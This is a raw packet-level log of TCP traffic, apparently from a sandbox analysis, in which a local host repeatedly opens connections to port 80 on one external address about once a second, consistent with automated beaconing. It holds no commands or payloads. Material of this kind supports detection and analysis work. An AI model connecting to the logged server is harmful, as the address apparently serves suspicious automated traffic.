                          Sep 26, 2024 17:06:28.007555962 CEST8055672185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:28.234582901 CEST8055672185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:28.234707117 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.346993923 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.347320080 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.555290937 CEST8055673185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:28.555336952 CEST8055672185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:28.555433035 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.555469036 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.555716038 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.560528040 CEST8055673185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:29.270960093 CEST8055673185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:29.271017075 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.273848057 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.278656960 CEST8055673185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:29.507033110 CEST8055673185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:29.507157087 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.613177061 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.613491058 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.618345976 CEST8055674185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:29.618449926 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.618474960 CEST8055673185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:29.618520021 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.618700027 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.623528957 CEST8055674185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:30.327445984 CEST8055674185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:30.327565908 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.328258038 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.333523035 CEST8055674185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:30.577008963 CEST8055674185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:30.577168941 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.862979889 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.863322973 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.868231058 CEST8055675185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:30.868249893 CEST8055674185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:30.868331909 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.868520021 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.868520021 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.873440027 CEST8055675185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:31.605555058 CEST8055675185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:31.605681896 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.606581926 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.611427069 CEST8055675185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:31.838464975 CEST8055675185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:31.838578939 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.940767050 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.940999985 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.945887089 CEST8055676185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:31.945980072 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.946082115 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.946094990 CEST8055675185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:31.946144104 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.950875998 CEST8055676185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:32.642419100 CEST8055676185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:32.642544031 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:32.643196106 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:32.648011923 CEST8055676185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:32.872140884 CEST8055676185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:32.872231007 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:32.998393059 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:32.998738050 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:33.004306078 CEST8055676185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:33.004319906 CEST8055677185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:33.004399061 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:33.004435062 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:33.004610062 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:33.009413004 CEST8055677185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:33.706315041 CEST8055677185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:33.706392050 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:33.707165956 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:33.711963892 CEST8055677185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:33.934096098 CEST8055677185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:33.934161901 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.050100088 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.050417900 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.055270910 CEST8055678185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:34.055346966 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.055408955 CEST8055677185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:34.055437088 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.055452108 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.060213089 CEST8055678185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:34.762482882 CEST8055678185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:34.762646914 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.763396025 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.768182039 CEST8055678185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:34.994739056 CEST8055678185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:34.994848967 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.097023964 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.097351074 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.102168083 CEST8055678185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:35.102196932 CEST8055679185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:35.102248907 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.102308989 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.102489948 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.107260942 CEST8055679185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:35.797306061 CEST8055679185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:35.797414064 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.804246902 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.809190035 CEST8055679185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:36.027578115 CEST8055679185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:36.027780056 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.144762993 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.145565033 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.149928093 CEST8055679185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:36.150088072 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.150413990 CEST8055680185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:36.150521994 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.150890112 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.155818939 CEST8055680185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:36.850660086 CEST8055680185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:36.850739956 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.866652012 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.871448994 CEST8055680185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:37.101211071 CEST8055680185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:37.101299047 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.206296921 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.206630945 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.211551905 CEST8055681185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:37.211580038 CEST8055680185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:37.211649895 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.211677074 CEST5568080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.211791039 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.216510057 CEST8055681185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:37.948664904 CEST8055681185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:37.948755980 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.951479912 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:37.956449032 CEST8055681185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:38.180243969 CEST8055681185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:38.180342913 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:38.285410881 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:38.285784960 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:38.290594101 CEST8055682185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:38.290730000 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:38.290827990 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:38.291219950 CEST8055681185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:38.291271925 CEST5568180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:38.295629025 CEST8055682185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:39.010049105 CEST8055682185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:39.010123968 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.010701895 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.015474081 CEST8055682185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:39.243298054 CEST8055682185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:39.243400097 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.347022057 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.347434044 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.352268934 CEST8055683185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:39.352356911 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.352461100 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.352572918 CEST8055682185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:39.352629900 CEST5568280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:39.357491016 CEST8055683185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:40.051671028 CEST8055683185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:40.051748991 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.052391052 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.057179928 CEST8055683185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:40.277755022 CEST8055683185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:40.277899027 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.394079924 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.394402981 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.399647951 CEST8055684185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:40.399729013 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.399821997 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.400033951 CEST8055683185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:40.400079966 CEST5568380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:40.404884100 CEST8055684185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:41.091953993 CEST8055684185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:41.092055082 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.092789888 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.097574949 CEST8055684185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:41.316405058 CEST8055684185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:41.316545963 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.426234007 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.427103043 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.431415081 CEST8055684185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:41.431549072 CEST5568480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.431940079 CEST8055685185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:41.432066917 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.432535887 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:41.437314034 CEST8055685185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:42.166551113 CEST8055685185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:42.166615963 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.167237043 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.172311068 CEST8055685185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:42.395185947 CEST8055685185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:42.395391941 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.503328085 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.503634930 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.508402109 CEST8055686185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:42.508507967 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.508586884 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.508641958 CEST8055685185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:42.508688927 CEST5568580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:42.513447046 CEST8055686185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:43.225728989 CEST8055686185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:43.225826025 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.226674080 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.231420994 CEST8055686185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:43.462884903 CEST8055686185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:43.463068962 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.565956116 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.566189051 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.571161032 CEST8055686185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:43.571237087 CEST5568680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.571274996 CEST8055687185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:43.571356058 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.571501970 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:43.576616049 CEST8055687185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:44.271430016 CEST8055687185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:44.271500111 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.272093058 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.278141022 CEST8055687185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:44.500443935 CEST8055687185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:44.500586033 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.724834919 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.725162029 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.729988098 CEST8055688185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:44.730065107 CEST8055687185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:44.730077028 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.730118036 CEST5568780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.732155085 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:44.736896992 CEST8055688185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:45.456552029 CEST8055688185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:45.456693888 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.462275982 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.467066050 CEST8055688185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:45.698806047 CEST8055688185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:45.698924065 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.800121069 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.800468922 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.805219889 CEST8055688185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:45.805315018 CEST5568880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.805318117 CEST8055689185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:45.805408001 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.805583954 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:45.810352087 CEST8055689185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:46.514834881 CEST8055689185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:46.514914989 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.515559912 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.520292997 CEST8055689185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:46.741858006 CEST8055689185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:46.741981030 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.847109079 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.847461939 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.852179050 CEST8055689185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:46.852241039 CEST5568980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.852252960 CEST8055690185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:46.852318048 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.852421999 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:46.857264996 CEST8055690185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:47.553034067 CEST8055690185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:47.553137064 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.555301905 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.561249971 CEST8055690185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:47.781078100 CEST8055690185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:47.781172991 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.894083023 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.894412994 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.899507999 CEST8055691185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:47.899597883 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.899945021 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.900532007 CEST8055690185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:47.900593996 CEST5569080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:47.904784918 CEST8055691185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:48.607697010 CEST8055691185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:48.607928038 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:48.608675003 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:48.613464117 CEST8055691185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:48.841314077 CEST8055691185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:48.841547966 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:48.956399918 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:48.956703901 CEST5569280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:48.961776972 CEST8055692185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:48.961869955 CEST5569280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:48.961951017 CEST5569280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:48.966698885 CEST8055692185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:48.978585958 CEST8055691185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:48.978836060 CEST5569180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:49.663727045 CEST8055692185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:49.663809061 CEST5569280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:49.664663076 CEST5569280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:49.669445992 CEST8055692185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:49.887764931 CEST8055692185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:49.887897968 CEST5569280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:50.003843069 CEST5569280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:50.004530907 CEST5569380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:50.009279966 CEST8055692185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:50.009344101 CEST8055693185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:50.009377003 CEST5569280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:50.009445906 CEST5569380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:50.009607077 CEST5569380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:50.014353991 CEST8055693185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:50.718216896 CEST8055693185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:50.718494892 CEST5569380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:50.720468998 CEST5569380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:50.725375891 CEST8055693185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:50.952598095 CEST8055693185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:50.952656984 CEST5569380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:51.066042900 CEST5569380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:51.066364050 CEST5569480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:51.071161032 CEST8055694185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:51.071232080 CEST8055693185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:51.071261883 CEST5569480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:51.071299076 CEST5569380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:51.071559906 CEST5569480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:51.076358080 CEST8055694185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:51.787897110 CEST8055694185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:51.787980080 CEST5569480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:51.791172981 CEST5569480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:51.795964003 CEST8055694185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:52.044739962 CEST8055694185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:52.044853926 CEST5569480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:52.159604073 CEST5569480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:52.159995079 CEST5569580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:52.164774895 CEST8055694185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:52.164802074 CEST8055695185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:52.164824009 CEST5569480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:52.164866924 CEST5569580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:52.165045023 CEST5569580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:52.169742107 CEST8055695185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:52.860023975 CEST8055695185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:52.860239983 CEST5569580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:52.861165047 CEST5569580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:52.865967989 CEST8055695185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:53.087915897 CEST8055695185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:53.088135004 CEST5569580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:53.191009998 CEST5569580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:53.191405058 CEST5569680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:53.196052074 CEST8055695185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:53.196121931 CEST5569580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:53.196178913 CEST8055696185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:53.196235895 CEST5569680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:53.196351051 CEST5569680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:53.201050997 CEST8055696185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:53.931524992 CEST8055696185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:53.931612968 CEST5569680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:53.935012102 CEST5569680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:53.939836025 CEST8055696185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:54.172363043 CEST8055696185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:54.172482014 CEST5569680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:54.284754038 CEST5569680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:54.285115957 CEST5569780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:54.289993048 CEST8055697185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:54.290072918 CEST5569780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:54.290257931 CEST5569780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:54.291836977 CEST8055696185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:54.291891098 CEST5569680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:54.295057058 CEST8055697185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:55.040893078 CEST8055697185.215.113.16192.168.2.4
